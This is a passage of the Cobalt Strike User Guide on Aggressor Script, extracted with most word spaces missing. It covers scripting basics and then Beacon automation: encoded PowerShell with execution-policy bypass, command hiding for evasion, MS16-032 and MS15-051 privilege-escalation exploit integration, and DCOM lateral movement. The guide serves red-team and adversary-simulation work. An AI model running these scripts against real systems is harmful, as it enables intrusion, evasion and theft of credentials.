BeaconObjectFiles/FormattingBOFOutput 62 format = BeaconDataInt(&parser); 63 ReadvirtualMemory(module, function, size, format); 64 } InthisBOF,usershavetheoptiontoreadanarbitrarynumberofbytesofafunctionwithinthe currentprocessanddisplayitinspecificformats.UsingtheBeaconFormatAPI,thisbecomes trivialtodo. Forexample,youcandisplaybytesasfollows: Thismakesiteasytocopypastetheoutputandputitinadecompilerlikeso: Otherswouldratherhaveallthebytesrightnexttoeachotherlikeso: CobaltStrikeUserGuide www.fortra.com page:185
AggressorScript/WhatisAggressorScript? Aggressor Script What is Aggressor Script? AggressorScriptisthescriptinglanguagebuiltintoCobaltStrike,version3.0,andlater. AggressorScriptallowsyoutomodifyandextendtheCobaltStrikeclient. History AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploitFramework anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis workisAggressorScript. AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit toextendandmodifytheCobaltStrikeclienttoyourneeds. Status AggressorScriptispartofCobaltStrike3.0'sfoundation.Mostpopupmenusandthe presentationofeventsinCobaltStrike3.0aremanagedbytheAggressorScriptengine.That said,AggressorScriptisstillinitsinfancy.StrategicCyberLLChasyettobuildAPIsformostof CobaltStrike'sfeatures.ExpecttoseeAggressorScriptevolveovertime.Thisdocumentationis alsoaworkinprogress. How to Load Scripts AggressorScriptisbuiltintotheCobaltStrikeclient.Topermanentlyloadascript,gotoCobalt Strike -> Script ManagerandpressLoad. CobaltStrikeUserGuide www.fortra.com page:186
AggressorScript/TheScriptConsole figure69-CobaltStrikeScriptLoader The Script Console CobaltStrikeprovidesaconsoletocontrolandinteractwithyourscripts.Throughtheconsole youmaytrace,profile,debug,andmanageyourscripts.TheAggressorScriptconsoleis availableviaView -> Script Console. Thefollowingcommandsareavailableintheconsole: Command Arguments What it does ? "foo"iswm"foobar" evaluateasleeppredicateandprintresult e println("foo"); evaluateasleepstatement help listallofthecommandsavailable load /path/to/script.cna loadanAggressorScriptscript ls listallofthescriptsloaded proff script.cna disabletheSleepprofilerforthescript profile script.cna dumpsperformancestatisticsforthescript. pron script.cna enablestheSleepprofilerforthescript reload script.cna reloadsthescript troff script.cna disablefunctiontraceforthescript tron script.cna enablefunctiontraceforthescript unload script.cna unloadthescript x 2+2 evaluateasleepexpressionandprintresult CobaltStrikeUserGuide www.fortra.com page:187
AggressorScript/HeadlessCobaltStrike figure70-Interactingwiththescriptconsole Headless Cobalt Strike YoumayuseAggressorScriptswithouttheCobaltStrikeGUI.Theagscriptprogram(included withtheCobaltStrikeLinuxpackage)runstheheadlessCobaltStrikeclient.Theagscript programrequiresfourarguments: ./agscript [host] [port] [user] [password] TheseargumentsconnecttheheadlessCobaltStrikeclienttotheteamserveryouspecify.The headlessCobaltStrikeclientpresentstheAggressorScriptconsole. Youmayuseagscripttoimmediatelyconnecttoateamserverandrunascriptofyour choosing.Use: ./agscript [host] [port] [user] [password] [/path/to/script.cna] ThiscommandwillconnecttheheadlessCobaltStrikeclienttoateamserver,loadyourscript, andrunit.TheheadlessCobaltStrikeclientwillrunyourscriptbeforeitsynchronizeswiththe teamserver.Useon readytowaitfortheheadlessCobaltStrikeclienttofinishthedata synchronizationstep. on ready { println("Hello World! I am synchronized!"); closeClient(); } AQuick Sleep Introduction CobaltStrikeUserGuide www.fortra.com page:188
AggressorScript/AQuickSleepIntroduction AggressorScriptbuildsonRaphaelMudge'sSleepScriptingLanguage.TheSleepmanualis availableathttp://sleep.dashnine.org/manual AggressorScriptwilldoanythingthatSleepdoessuchas: l Sleep'ssyntax,operators,andidiomsaresimilartothePerlscriptinglanguage.Thereis onemajordifferencethatcatchesnewprogrammers.Sleeprequireswhitespace betweenoperatorsandtheirterms.Thefollowingcodeisnotvalid: $x=1+2; # this will not parse!! Thisstatementisvalidthough: $x = 1 + 2; l Sleepvariablesarecalledscalarsandscalarsholdstrings,numbersinvariousformats, Javaobjectreferences,functions,arrays,anddictionaries.Hereareseveral assignmentsinSleep: $x = "Hello World"; $y = 3; $z = @(1, 2, 3, "four"); $a = %(a => "apple", b => "bat", c => "awesome language", d => 4); l Arraysanddictionariesarecreatedwiththe@ and% functions.Arraysanddictionaries mayreferenceotherarraysanddictionaries.Arraysanddictionariesmayevenreference themselves. l Commentsbeginwitha#andgountiltheendoftheline. l Sleepinterpolatesdouble-quotedstrings.Thismeansthatanywhite-spaceseparated tokenbeginningwitha$ signisreplacedwithitsvalue.Thespecialvariable$+ concatenatesaninterpolatedstringwithanothervalue. println("$a is: $a and \n$x joined with $y is: $x $+ $y"); Thiswillprintout: $a is: %(d => 4, b => 'bat', c => 'awesome language', a => 'apple') and $x joined with $y is: Hello World3 l There'safunctioncalled&warn.Itworkslike&println,exceptitincludesthecurrent scriptnameandalinenumbertoo.Thisisagreatfunctiontodebugcodewith. l Sleepfunctionsaredeclaredwiththesubkeyword.Argumentstofunctionsarelabeled $1,$2,allthewayupto$n.Functionswillacceptanynumberofarguments.The variable@isanarraycontainingalloftheargumentstoo.Changesto$1,$2,etc.will alterthecontentsof@. CobaltStrikeUserGuide www.fortra.com page:189
AggressorScript/InteractingwiththeUser sub addTwoValues { println($1 + $2); } addTwoValues("3", 55.0); Thisscriptprintsout: 58.0 l InSleep,afunctionisafirst-classtypelikeanyotherobject.Hereareafewthingsthat youmaysee: $addf = &addTwoValues; l The$addfvariablenowreferencesthe&addTwoValuesfunction.Tocallafunction enclosedinavariable,use: [$addf : "3", 55.0]; l ThisbracketnotationisalsousedtomanipulateJavaobjects.Irecommendreadingthe Sleepmanualifyou'reinterestedinlearningmoreaboutthis.Thefollowingstatements areequivalentandtheydothesamething: [$addf : "3", 55.0]; [&addTwoValues : "3", 55.0]; [{ println($1 + $2); } : "3", 55.0]; addTwoValues("3", 55.0); l Sleephasthreevariablescopes:global,closure-specific,andlocal.TheSleepmanual coversthisinmoredetail.Ifyouseelocal('$x$y$z')inanexample,itmeansthat$x,$y, and$zarelocaltothecurrentfunctionandtheirvalueswilldisappearwhenthefunction returns.Sleepuseslexicalscopingforitsvariables. Sleephasalloftheotherbasicconstructsyou'dexpectinascriptinglanguage.Youshouldread themanualtolearnmoreaboutit. Interacting with the User AggressorScriptdisplaysoutputusingSleep's&println,&printAll,&writeb,and&warnfunctions. Thesefunctionsdisplayoutputtothescriptconsole. Scriptsmayregistercommandsaswell.Thesecommandsallowscriptstoreceiveatrigger fromtheuserthroughtheconsole.Usethecommandkeywordtoregisteracommand: CobaltStrikeUserGuide www.fortra.com page:190
AggressorScript/CobaltStrike command foo{ println("Hello $1"); } Thiscodesnippetregistersthecommandfoo.Thescriptconsoleautomaticallyparsesthe argumentstoacommandandsplitsthembywhitespaceintotokensforyou.$1isthefirst token,$2isthesecondtoken,andsoon.Typically,tokensareseparatedbyspacesbutusers mayuse"doublequotes"tocreateatokenwithspaces.Ifthisparsingisdisruptivetowhatyou'd liketodowiththeinput,use$0toaccesstherawtextpassedtothecommand. figure71-CommandOutput Colors YoumayaddcolorandstylestotextthatisoutputinCobaltStrike'sconsoles.The\c,\U,and \oescapestellCobaltStrilehowtoformattext.Theseescapesareparsedinsideofdouble- quotedstringsonly. The\cXescapecolorsthetextthatcomesafterit.Xspecifiesthecolor.Yourcolorchoicesare: figure72-ColorOptions The\Uescapeunderlinesthetextthatcomesafterit.Asecond\Ustopstheunderlineformat. The\oescaperesetstheformatofthetextthatcomesafterit.Anewlineresetstextformatting aswell. Cobalt Strike The Cobalt Strike Client TheAggressorScriptengineisthegluefeatureinCobaltStrike.MostCobaltStrikedialogsand featuresarewrittenasstand-alonemodulesthatexposesomeinterfacetotheAggressorScript engine. CobaltStrikeUserGuide www.fortra.com page:191
AggressorScript/CobaltStrike Aninternalscript,default.cna,definesthedefaultCobaltStrikeexperience.Thisscriptdefines CobaltStrike'stoolbarbuttons,popupmenus,anditalsoformatstheoutputformostCobalt Strikeevents. ThischapterwillshowyouhowthesefeaturesworkandempoweryoutoshapetheCobalt Strikeclienttoyourneeds. figure73-Thedefault.cnascript Keyboard Shortcuts Scriptsmaycreatekeyboardshortcuts.Usethebindkeywordtobindakeyboardshortcut.This exampleshowsHello World!inadialogboxwhenCtrlandHarepressedtogether. bind Ctrl+H { show_message("Hello World!"); } CobaltStrikeUserGuide www.fortra.com page:192
AggressorScript/CobaltStrike KeyboardshortcutsmaybeanyASCIIcharactersoraspecialkey.Shortcutsmayhaveoneor moremodifiersappliedtothem.Amodifierisoneof:Ctrl,Shift,Alt,orMeta.Scriptsmayspecify themodifier+key. Popup Menus ScriptsmayalsoaddtoCobaltStrike'smenustructureorre-defineit.Thepopupkeywordbuilds amenuhierarchyforapopuphook. Here'sthecodethatdefinesCobaltStrike'shelpmenu: popup help { item("&Homepage", { url_open("https://www.cobaltstrike.com/"); }); item("&Support", { url_open("https://www.cobaltstrike.com/support"); }); item("&Arsenal", { url_open("https://www.cobaltstrike.com/scripts"); }); separator(); item("&Malleable C2 Profile", { openMalleableProfileDialog(); }); item("&System Information", { openSystemInformationDialog(); }); separator(); item("&About", { openAboutDialog(); }); } Thisscripthooksintothehelppopuphookanddefinesseveralmenuitems.The&inthemenu itemnameisitskeyboardaccelerator.Thecodeblockassociatedwitheachitemexecutes whentheuserclicksonit. Scriptsmaydefinemenuswithchildrenaswell.Themenukeyworddefinesanewmenu.When theuserhoversoverthemenu,theblockofcodeassociatedwithitisexecutedandusedto buildthechildmenu. Here'sthePivotGraphmenuasanexampleofthis: popup pgraph { menu "&Layout" { item "&Circle" { graph_layout($1, "circle"); } item "&Stack" { graph_layout($1, "stack"); } menu "&Tree" { item "&Bottom" { graph_layout($1, "tree-bottom"); } item "&Left" { graph_layout($1, "tree-left"); } item "&Right" { graph_layout($1, "tree-right"); } item "&Top" { graph_layout($1, "tree-top"); } } separator(); item "&None" { graph_layout($1, "none"); } CobaltStrikeUserGuide www.fortra.com page:193
AggressorScript/CobaltStrike } } IfyourscriptspecifiesamenuhierarchyforaCobaltStrikemenuhook,itwilladdtothemenus thatarealreadyinplace.Usethe&popup_clearfunctiontocleartheotherregisteredmenu itemsandre-defineapopuphierarchytoyourtaste. Custom Output ThesetkeywordinAggressorScriptdefineshowtoformataneventandpresentitsoutputto theuser.Here'sanexampleofthesetkeyword: set EVENT_SBAR_LEFT { return "[" . tstamp(ticks()) . "] " . mynick(); } set EVENT_SBAR_RIGHT { return "[lag: $1 $+ ]"; } TheabovecodedefinesthecontentofthestatusbarinCobaltStrike'sEventLog(View -> Event Log).Theleftsideofthisstatusbarshowsthecurrenttimeandyournickname.Therightside showstheround-triptimeforamessagebetweenyourCobaltStrikeclientandtheteamserver. YoumayoverrideanysetoptionintheCobaltStrikedefaultscript.Createyourownfilewith definitionsforeventsyoucareabout.LoaditintoCobaltStrike.CobaltStrikewilluseyour definitionsoverthebuilt-inones. Events Usetheonkeywordtodefineahandlerforanevent.ThereadyeventfireswhenCobaltStrikeis connectedtotheteamserverandreadytoactonyourbehalf. on ready { show_message("Ready for action!"); } CobaltStrikegenerateseventsforavarietyofsituations.Usethe*meta-eventtowatchall eventsCobaltStrikefires. on * { local('$handle $event $args'); CobaltStrikeUserGuide www.fortra.com page:194
AggressorScript/DataModel $event = shift(@); $args = join(" ", @); $handle = openf(">>eventspy.txt"); writeb($handle, "[ $+ $event $+ ] $args"); closef($handle); } Data Model CobaltStrike'steamserverstoresyourhosts,services,credentials,andotherinformation.It alsobroadcaststhisinformationandmakesitavailabletoallclients. Data API Usethe&data_queryfunctiontoqueryCobaltStrike'sdatamodel.Thisfunctionhasaccessto allstateandinformationmaintainedbytheCobaltStrikeclient.Use&data_keystogetalistof thedifferentpiecesofdatayoumayquery.ThisexamplequeriesalldatainCobaltStrike'sdata modelandexportsittoatextfile: command export { local('$handle $model $row $entry $index'); $handle = openf(">export.txt"); foreach $model (data_keys()) { println($handle, "== $model =="); println($handle, data_query($model)); } closef($handle); println("See export.txt for the data."); } CobaltStrikeprovidesseveralfunctionsthatmakeitmoreintuitivetoworkwiththedatamodel. Model Function Description applications &applications SystemProfilerResults[View -> Applications] archives &archives Engagementevents/activities CobaltStrikeUserGuide www.fortra.com page:195
AggressorScript/Listeners Model Function Description beacons &beacons Activebeacons credentials &credentials Usernames,passwords,etc. downloads &downloads Downloadedfiles keystrokes &keystrokes KeystrokesreceivedbyBeacon screenshots &screenshots ScreenshotscapturedbyBeacon services &services Servicesandserviceinformation sites &sites AssetshostedbyCobaltStrike socks &pivots SOCKSproxyserversandportforwards targets &targets Hostsandhostinformation Thesefunctionsreturnanarraywithonerowforeachentryinthedatamodel.Eachentryisa dictionarywithdifferentkey/valuepairsthatdescribetheentry. ThebestwaytounderstandthedatamodelistoexploreitthroughtheAggressorScript console.GotoView -> Script Consoleandusethexcommandtoevaluateanexpression.For example: figure74-QueryingDatafromtheAggressorScriptconsole Useon DATA_KEYtosubscribetochangestoaspecificdatamodel. on keystrokes { println("I have new keystrokes: $1"); } Listeners CobaltStrikeUserGuide www.fortra.com page:196
AggressorScript/Listeners ListenersareCobaltStrike'sabstractionontopofpayloadhandlers.Alistenerisaname attachedtopayloadconfigurationinformation(e.g.,protocol,host,port,etc.)and,insome cases,apromisetosetupaservertoreceiveconnectionsfromthedescribedpayload. Listener API AggressorScriptaggregateslistenerinformationfromalloftheteamserversyou'recurrently connectedto.Thismakesiteasytopasssessionstoanotherteamserver.Togetalistofall listenernames,usethe&listenersfunction.Ifyouwouldliketoworkwithlocallistenersonly,use &listeners_local.The&listener_infofunctionresolvesalistenernametoitsconfiguration information.ThisexampledumpsalllistenersandtheirconfigurationtotheAggressorScript console: command listeners { local('$name $key $value'); foreach $name (listeners()) { println("== $name == "); foreach $key => $value (listener_info($name)) { println("$[20]key : $value"); } } } Creating Listeners Use&listener_create_exttocreatealistenerandstartapayloadhandlerassociatedwithit. Choosing Listeners Use&openPayloadHelpertoopenadialogthatlistsallavailablelisteners.Aftertheuserselects alistener,thisdialogwillclose,andCobaltStrikewillrunacallbackfunction.Here'sthesource codeforBeacon'sspawnmenu: item "&Spawn" { openPayloadHelper(lambda({ binput($bids, "spawn $1"); bspawn($bids, $1); }, $bids => $1)); } Stagers CobaltStrikeUserGuide www.fortra.com page:197
AggressorScript/Listeners Astagerisatinyprogramthatdownloadsapayloadandpassesexecutiontoit.Stagersare idealforsize-constrainedpayloaddeliveryvector(e.g.,auser-drivenattack,amemory corruptionexploit,oraone-linercommand.Stagersdohavedownsidesthough.Theyintroduce anadditionalcomponenttoyourattackchainthatispossibletodisrupt.CobaltStrike'sstagers arebasedonthestagersintheMetasploitFrameworkandthesearewell-signaturedand understoodinmemoryaswell.Usepayload-specificstagersifyoumust;butit'sbesttoavoid themotherwise. Use&stagertoexportapayloadstagertiedtoaCobaltStrikepayload.Notallpayloadoptions haveanexplicitpayloadstager.Notallstagershavex64options. The&artifact_stagerfunctionwillexportaPowerShellscript,executable,orDLLthatrunsa stagerassociatedwithaCobaltStrikepayload. Local Stagers Forpost-exploitationactionsthatrequiretheuseofastager,usealocalhost-onlybind_tcp stager.Theuseofthisstagerallowsastaging-requiredpost-exploitationactiontoworkwithall ofCobaltStrike'spayloadsequally. Use&stager_bind_tcptoexportabind_tcppayloadstager.Use&beacon_stage_tcptodelivera payloadtothisstager. &artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or DLLtohostit. Named Pipe Stager CobaltStrikedoeshaveabind_pipestagerthatisusefulforsomelateralmovementsituations. Thisstagerisx86only.Use&stager_bind_pipetoexportthisbind_pipestager.Use&beacon_ stage_pipetodeliverapayloadtothisstager. &artifact_generalwillacceptthisarbitrarycodeandgenerateaPowerShellscript,executable,or DLLtohostit. Stageless Payloads Use&payloadtoexportaCobaltStrikepayload(initsentirety)asaready-to-runposition- independentprogram. &artifact_payloadwillexportaPowerShellscript,executable,orDLLthatcontaintsthispayload. CobaltStrikeUserGuide www.fortra.com page:198
AggressorScript/Beacon Beacon BeaconisCobaltStrike'sasynchronouspost-exploitationagent.Inthischapter,wewillexplore optionstoautomateBeaconwithCobaltStrike'sAggressorScript. Metadata CobaltStrikeassignsasessionIDtoeachBeacon.ThisIDisarandomnumber.CobaltStrike associatestasksandmetadatawitheachBeaconID.Use&beaconstoquerymetadataforall currentBeaconsessions.Use&beacon_infotoquerymetadataforaspecificBeaconsession. Here'sascripttodumpinformationabouteachBeaconsession: command beacons { local('$entry $key $value'); foreach $entry (beacons()) { println("== " . $entry['id'] . " =="); foreach $key => $value ($entry) { println("$[20]key : $value"); } println(); } } Aliases YoumaydefinenewBeaconcommandswiththealiaskeyword.Here'sahelloaliasthatprints HelloWorldinaBeaconconsole. alias hello { blog($1, "Hello World!"); } Puttheaboveintoascript,loaditintoCobaltStrike,andopenaBeaconconsole.Thenenterin thehellocommandandpressenter.CobaltStrikewilleventabcompleteyouraliasesforyou. YoushouldseeHelloWorld!intheBeaconconsole. Youmayalsousethe&aliasfunctiontodefineanalias. CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments withoutanyparsing.$1istheIDoftheBeaconthealiaswastypedfrom.Thearguments$2and oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby spaces.Usersmayuse"doublequotes"togroupwordsintooneargument. CobaltStrikeUserGuide www.fortra.com page:199
AggressorScript/Beacon alias saywhat { blog($1, "My arguments are: " . substr($0, 8) . "\n"); } YoumayalsoregisteryouraliaseswithBeacon'shelpsystem.Use&beacon_command_register toregisteracommand. AliasesareaconvenientwaytoextendBeaconandmakeityourown.Aliasesalsoplaywellinto CobaltStrike'sthreatemulationrole.Youmayusealiasestoscriptcomplexpost-exploitation actionsinawaythatmapstoanotheractor'stradecraft.Yourredteamoperatorssimplyneed toloadascript,learnthealiases,andtheycanoperatewithyourscriptedtacticsinawaythat's consistentwiththeactoryou'reemulating. Reacting to new Beacons AcommonuseofAggressorScriptistoreacttonewBeacons.Usethebeacon_initialeventto setupcommandsthatshouldrunwhenaBeaconchecksinforthefirsttime. on beacon_initial {
do some stuff
} The$1argumenttobeacon_initialistheIDofthenewBeacon. Thebeacon_initialeventfireswhenaBeaconreportsmetadataforthefirsttime.Thismeansa DNSBeaconwillnotfirebeacon_initialuntilitsaskedtorunacommand.TointeractwithaDNS Beaconthatcallshomeforthefirsttime,usethebeacon_initial_emptyevent.
some sane defaults for DNS Beacon
on beacon_initial_empty { bmode($1, "dns-txt"); bcheckin($1); } Popup Menus YoumayalsoaddontoBeaconspopupmenu.Aliasesarenice,buttheyonlyaffectoneBeacon atatime.Throughapopupmenu,yourscript'susersmaytaskmultipleBeaconstotakethe desiredactionatonetime. Thebeacon_topandbeacon_bottompopuphooksletyouaddtothedefaultBeaconmenu. TheargumenttotheBeaconpopuphooksisanarrayofselectedBeaconIDs. CobaltStrikeUserGuide www.fortra.com page:200
AggressorScript/Beacon popup beacon_bottom { item "Run All..." { prompt_text("Which command to run?", "whoami /groups", lambda({ binput(@ids, "shell $1"); bshell(@ids, $1); }, @ids => $1)); } } The Logging Contract CobaltStrike3.0andlaterdoadecentjoboflogging.EachcommandissuedtoaBeaconis attributedtoanoperatorwithadateandtimestamp.TheBeaconconsoleintheCobaltStrike clienthandlesthislogging.Scriptsthatexecutecommandsfortheuserdonotrecord commandsoroperatorattributiontothelog.Thescriptisresponsiblefordoingthis.Usethe &binputfunctiontodothis.ThiscommandwillpostamessagetotheBeacontranscriptasif theuserhadtypedacommand. Acknowledging Tasks Customaliasesshouldcallthe&btaskfunctiontodescribetheactiontheuseraskedfor.This outputissenttotheBeaconlogandit'salsousedinCobaltStrike'sreports.MostAggressor ScriptfunctionsthatissueatasktoBeaconwillprinttheirownacknowledgementmessage.If you'dliketosuppressthis,add!tothefunctionname.Thiswillrunthequietvariantofthe function.Aquietfunctiondoesnotprintataskacknowledgement.Forexample,&bshell!isthe quietvariantof&bshell. alias survey { btask($1, "Surveying the target!", "T1082"); bshell!($1, "echo Groups && whoami /groups"); bshell!($1, "echo Processes && tasklist /v"); bshell!($1, "echo Connections && netstat -na | findstr "EST""); bshell!($1, "echo System Info && systeminfo"); } Thelastargumentto&btaskisacomma-separatedlistofATT&CKtechniques.T1082is SystemInformationDiscovery.ATT&CKisaprojectfromtheMITRECorporationtocategorize anddocumentattackeractions.CobaltStrikeusesthesetechniquestobuilditsTactics, Techniques,andProceduresreport.YoumaylearnmoreaboutMITRE'sATT&CKmatrixat: https://attack.mitre.org/ Conquering the Shell CobaltStrikeUserGuide www.fortra.com page:201
AggressorScript/Beacon Aliasesmayoverrideexistingcommands.Here'sanAggressorScriptimplementationof Beacon'spowershellcommand: alias powershell { local('$args $cradle $runme $cmd');
$0 is the entire command with no parsing.
$args = substr($0, 11);
generate the download cradle (if one exists) for an imported PowerShell script
$cradle = beacon_host_imported_script($1);
encode our download cradle AND cmdlet+args we want to run
$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
Build up our entire command line.
$cmd = " -nop -exec bypass -EncodedCommand " $+ $runme $+ "";
task Beacon to run all of this.
btask($1, "Tasked beacon to run: $args", "T1086"); beacon_execute_job($1, "powershell", $cmd, 1); } ThisaliasdefinesapowershellcommandforusewithinBeacon.Weuse$0tograbthedesired PowerShellstringwithoutanyparsing.It'simportanttoaccountforanimportedPowerShell script(iftheuserimportedonewithpowershell-import).Weuse&beacon_host_imported_script forthis.ThisfunctiontasksBeacontohostanimportedscriptonaone-offwebserverboundto localhost.ItalsoreturnsastringwiththePowerShelldownloadcradlethatdownloadsand evaluatestheimportedscript.The-EncodedCommandflaginPowerShellacceptsascriptasa base64string.There'sonewrinkle.WemustencodeourstringaslittleendianUTF16text.This aliasuses&str_encodetodothis.The&btaskcalllogsthisrunofPowerShellandassociatesit withtacticT1086.The&beacon_execute_jobfunctiontasksBeacontorunpowershelland reportitsoutputbacktoBeacon. Similarly,wemayre-definetheshellcommandinBeacontoo.Thisaliascreatesanalternate shellcommandthathidesyourWindowscommandsinanenvironmentvariable. alias shell { local('$args'); $args = substr($0, 6); btask($1, "Tasked beacon to run: $args (OPSEC)", "T1059"); bsetenv!($1, "", $args); beacon_execute_job($1, "%COMSPEC%", " /C %%", 0); } CobaltStrikeUserGuide www.fortra.com page:202
AggressorScript/Beacon The&btaskcalllogsourintentionandassociatesitwithtacticT1059.The&bsetenvassignsour Windowscommandtotheenvironmentvariable_.Thescriptuses!tosuppress&bsetenv'stask acknowledgement.The&beacon_execute_jobfunctionruns%COMSPEC%withargumnents /C %%.Thisworksbecause&beacon_execute_jobwillresolveenvironmentvariablesinthe commandparameter.Itdoesnotresolveenvironmentvariablesintheargumentparameter. Becauseofthis,wecanuse%COMSPEC%tolocatetheuser'sshell,butpass%%asan argumentwithoutimmediateinterpolation. Privilege Escalation (Run a Command) Beacon'srunasadmincommandattemptstorunacommandinanelevatedcontext.This commandacceptsanelevatornameandacommand(commandANDarguments:)).The &beacon_elevator_registerfunctionmakesanewelevatoravailabletorunasadmin.. beacon_elevator_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_elevator); Thiscoderegisterstheelevatorms16-032withBeacon'srunasadmincommand.Adescription isgivenaswell.Whentheusertypesrunasadmin ms16-032 notepad.exe,CobaltStrikewill run&ms16_032_elevatorwiththesearguments:$1isthebeaconsessionID.$2isthe commandandarguments.Here'sthe&ms16_032_elevatorfunction:
Integrate ms16-032
Sourced from Empire:
https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc sub ms16_032_elevator { local('$handle $script $oneliner');
acknowledge this command
btask($1, "Tasked Beacon to execute $2 via ms16-032", "T1068");
read in the script
$handle = openf(getFileProper(script_resource("modules"), "Invoke- MS16032.ps1")); $script = readb($handle, -1); closef($handle);
host the script in Beacon
$oneliner = beacon_host_script($1, $script);
run the specified command via this exploit.
bpowerpick!($1, "Invoke-MS16032 -Command " $+ $2 $+ "", $oneliner); } CobaltStrikeUserGuide www.fortra.com page:203
AggressorScript/Beacon Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat correspondstothisaction. Theendofthisfunctionuses&bpowerpicktorunInvoke-MS16032withanargumenttorun ourcommand.ThePowerShellscriptthatimplementsInvoke-MS16032istoolargeforaone- linerthough.Tomitigatethis,theelevatorfunctionuses&beacon_host_scripttohostthelarge scriptwithinBeacon.The&beacon_host_scriptfunctionreturnsaone-linertograbthishosted scriptandevaluateit. Theexclamationpointafter&bpowerpicktellsAggressorScripttocallthequietvariantsofthis function.Quietfunctionsdonotprintataskdescription. There'snotmuchelsetodescribehere.Acommandelevatorscriptjustneedstoruna command.:) Privilege Escalation (Spawn a Session) Beacon'selevatecommandattemptstospawnanewsessionwithelevatedprivileges.This commandacceptsanexploitnameandalistener.The&beacon_exploit_registerfunction makesanewexploitavailabletoelevate. beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit); Thiscoderegisterstheexploitms15-051withBeacon'selevatecommand.Adescriptionis givenaswell.Whentheusertypeselevate ms15-051 foo,CobaltStrikewillrun&ms15_051_ exploitwiththesearguments:$1isthebeaconsessionID.$2isthelistenername(e.g.,foo). Here'sthe&ms15_051_exploitfunction:
Integrate windows/local/ms15_051_client_copy_image from Metasploit
https://github.com/rapid7/metasploit-
framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb sub ms15_051_exploit { local('$stager $arch $dll');
acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051", "T1068");
tune our parameters based on the target arch
if (-is64 $1) { $arch = "x64"; $dll = getFileProper(script_resource("modules"), "cve-2015-1701.x64.dll"); } CobaltStrikeUserGuide www.fortra.com page:204
AggressorScript/Beacon else { $arch = "x86"; $dll = getFileProper(script_resource("modules"), "cve-2015-1701.x86.dll"); }
generate our shellcode
$stager = payload($2, $arch);
spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, $dll, $stager, "ms15-051", 5000);
link to our payload if it's a TCP or SMB Beacon
beacon_link($1, $null, $2); } Thisfunctionuses&btasktoacknowledgetheactiontotheuser.Thedescriptionin&btaskwill goinCobaltStrike'slogsandreportsaswell.T1068istheMITREATT&CKtechniquethat correspondstothisaction. ThisfunctionrepurposesanexploitfromtheMetasploitFramework.Thisexploitiscompiledas cve-2015-1701.[arch].dllwithx86andx64variants.Thisfunction'sfirsttaskistoreadthe exploitDLLthatcorrespondstothetargetsystem'sarchitecture.The-is64predicatehelpswith this. The&payloadfunctiongeneratesrawoutputforourlistenernameandthespecified architecture. The&bdllspawnfunctionspawnsatemporaryprocess,injectsourexploitDLLintoit,and passesourexportedpayloadasanargument.ThisisthecontracttheMetasploitFramework usestopassshellcodetoitsprivilegeescalationexploitsimplementedasReflectiveDLLs. Finally,thisfunctioncalls&beacon_link.IfthetargetlistenerisanSMBorTCPBeaconpayload, &beacon_linkwillattempttoconnecttoit. Lateral Movement (Run a Command) Beacon'sremote-execcommandattemptstorunacommandonaremotetarget.This commandacceptsaremote-execmethod,atarget,andacommand+arguments.The &beacon_remote_exec_method_registerfunctionisbothareallylongfunctionnameandmakes anewmethodavailabletoremote-exec. beacon_remote_exec_method_register("com-mmc20", "Execute command via MMC20.Application COM Object", &mmc20_exec_method); CobaltStrikeUserGuide www.fortra.com page:205
AggressorScript/Beacon Thiscoderegisterstheremote-execmethodcom-mmc20withBeacon'sremote-exec command.Adescriptionisgivenaswell.Whentheusertypesremote-exec com-mmc20 c:\windows\temp\malware.exe,CobaltStrikewillrun&mmc20_exec_methodwiththese arguments:$1isthebeaconsessionID.$2isthetarget.$3isthecommandandarguments. Here'sthe&mmc20_exec_methodfunction: sub mmc20_exec_method { local('$script $command $args');
state what we're doing.
btask($1, "Tasked Beacon to run $3 on $2 via DCOM", "T1175");
separate our command and arguments
if ($3 ismatch '(.?) (.)') { ($command, $args) = matched(); } else { $command = $3; $args = ""; }
build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application
object $script = '[activator]::CreateInstance([type]::GetTypeFromProgID ("MMC20.Application", "'; $script .= $2; $script .= '")).Document.ActiveView.ExecuteShellCommand("'; $script .= $command; $script .= '", $null, "'; $script .= $args; $script .= '", "7");';
run the script we built up
bpowershell!($1, $script, ""); } Thisfunctionuses&btasktoacknowledgethetaskanddescribeittotheoperator(andlogsand reports).T1175istheMITREATT&CKtechniquethatcorrespondstothisaction.Ifyouroffense techniquedoesnotfitintoMITREATT&CK,don'tfret.Somecustomersareverymuchreadyfor achallengeandbenefitwhentheirredteamcreativelydeviatesfromwhatareknownoffense techniques.Doconsiderwritingablogpostaboutitfortherestofuslater. Thisfunctionthensplitsthe$3argumentintocommandandargumentportions.Thisisdone becausethetechniquerequiresthatthesevaluesareseparate. Afterwards,thisfunctionbuildsupaPowerShellcommandstringthatlookslikethis: CobaltStrikeUserGuide www.fortra.com page:206
